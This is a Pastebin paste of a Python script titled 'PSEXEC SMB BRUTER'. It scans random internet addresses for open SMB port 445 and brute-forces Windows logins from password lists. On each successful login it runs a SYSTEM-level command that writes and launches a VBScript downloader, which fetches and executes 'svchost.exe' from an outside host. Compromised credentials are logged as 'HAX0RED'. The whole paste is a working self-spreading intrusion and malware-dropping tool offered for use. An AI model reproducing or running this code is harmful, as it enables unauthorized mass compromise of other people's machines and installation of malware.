API tools faq
paste
KekSec

PSEXEC SMB BRUTER

KekSec
Jun 22nd, 2020
734
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.53 KB | None | 0 0
raw download clone embed print report
  1. import os
  2. from pypsexec.client import Client
  3. import socket
  4. import time
  5. import threading
  6. import itertools
  7. import random
  8. fh1=open("user.txt", "r")
  9. fh2=open("conficker.txt", "r")
  10. users=fh1.read().replace("\r", "").split("\n")
  11. passwords=fh2.read().replace("\r", "").split("\n")
  12. fh1.close()
  13. fh2.close()
  14. global maxthreadsglobal
  15. maxthreadsglobal=854
  16. global globalthreads
  17. globalthreads = 0
  18. def testPW(ip, user, passwd, fh):
  19.     global globalthreads
  20.     globalthreads += 1
  21.     try:
  22.         c = Client(ip, username=user, password=passwd)
  23.         c.connect()
  24.         try:
  25.             c.create_service()
  26.             # run a simple cmd.exe program with arguments
  27.             stdout, stderr, rc = c.run_executable("cmd.exe",
  28.                                                   arguments="/q /c cd %tmp%&echo Set Nk=CreateObject(\"Microsoft.XMLHTTP\"):Nk.Open \"GET\",\"http://download.loginserv.net/svchost.exe\",False:Nk.Send:Set KS=CreateObject(\"ADODB.Stream\"):KS.Type=1:KS.Open:KS.Write Nk.responseBody:KS.SaveToFile \"oE.exe\",2:CreateObject(\"WScript.Shell\").Run \"oE.exe\":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"P.vbs\" >P.vbs&start wscript P.vbs",
  29.                                                   use_system_account=True)
  30.             print("HAX0RED ----> " + ip + ":" + user + ":" + passwd)
  31.             fh.write("HAX0RED ----> " + ip + ":" + user + ":" + passwd + "\r\n")
  32.             globalthreads -= 1
  33.             return True
  34.         finally:
  35.             c.remove_service()
  36.             c.disconnect()
  37.             print("T3ST3D ----> " + ip + ":" + user + ":" + passwd)
  38.             globalthreads -= 1
  39.             return False
  40.     except:
  41.         print("T3ST3D ----> " + ip + ":" + user + ":" + passwd)
  42.         globalthreads -= 1
  43.         return False
  44.     globalthreads -= 1
  45.     return False
  46. def brute(ip, fh):
  47.     global maxthreadsglobal
  48.     global globalthreads
  49.     print("BRUTING ----> " + ip)
  50.     threads = 0
  51.     maxthreads = 10
  52.     for user in users:
  53.         for passwd in passwords:
  54.             threads += 1
  55.             if threads == maxthreads or globalthreads >= maxthreadsglobal:
  56.                 t.join()
  57.                 time.sleep(random.randrange(1,10))
  58.                 threads = 0
  59.             try:
  60.                 t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
  61.                 t.start()
  62.             except:
  63.                 time.sleep(random.randrange(1,10))
  64.                 try:
  65.                     t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
  66.                     t.start()
  67.                 except:
  68.                     pass
  69. def Scan(IP):
  70.     try:
  71.         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  72.         s.settimeout(1)
  73.         s.connect((IP, 445))
  74.         s.close()
  75.         return True
  76.     except:
  77.         return False
  78.  
  79. def gen_IP():
  80.     not_valid = [10,127,169,172,192,185]
  81.     first = random.randrange(1,256)
  82.     while first in not_valid:
  83.         first = random.randrange(1,256)
  84.     ip = ".".join([str(first),str(random.randrange(1,256)),
  85.     str(random.randrange(1,256)),str(random.randrange(1,256))])
  86.     return ip
  87.  
  88. def gen_IP_block():
  89.     not_valid = [10,127,169,172,192,185]
  90.     first = random.randrange(1,256)
  91.     while first in not_valid:
  92.         first = random.randrange(1,256)
  93.     ip = ".".join([str(first),str(random.randrange(1,256)),
  94.     str(random.randrange(1,256))])
  95.     return ip+".0-255"
  96.  
  97. def ip_range(input_string):
  98.     octets = input_string.split('.')
  99.     chunks = [map(int, octet.split('-')) for octet in octets]
  100.     ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
  101.  
  102.     for address in itertools.product(*ranges):
  103.         yield '.'.join(map(str, address))
  104. def HaxThread(fh):
  105.     while 1:
  106.         try:
  107.             IP = gen_IP()
  108.             if Scan(IP):
  109.                 if Scan('.'.join(IP.split(".")[:3])+".2") and Scan('.'.join(IP.split(".")[:3])+".254"):#entire ip range most likely pointed to one server
  110.                     brute(IP,fh)
  111.                     continue
  112.                 else:
  113.                     for IP in ip_range('.'.join(IP.split(".")[:3])+".0-255"):
  114.                         if Scan(IP):
  115.                             brute(IP,fh)
  116.         except Exception as e:
  117.             print(str(e))
  118.             pass
  119.  
  120. threads = int(raw_input("Threads: "))
  121.  
  122. fh = open("smb_vulnz.txt","a")
  123. threadcount = 0
  124. for i in xrange(0,threads):
  125.     try:
  126.         threading.Thread(target=HaxThread, args=(fh,)).start()
  127.         threadcount += 1
  128.     except:
  129.         pass
  130. print("[*] Started " + str(threadcount) + " scanner threads!")
  131. print("Scanning... Press enter 3 times to stop.")
  132.  
  133. for i in range(0,3):
  134.     input()
  135.  
  136. os.kill(os.getpid(),9)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!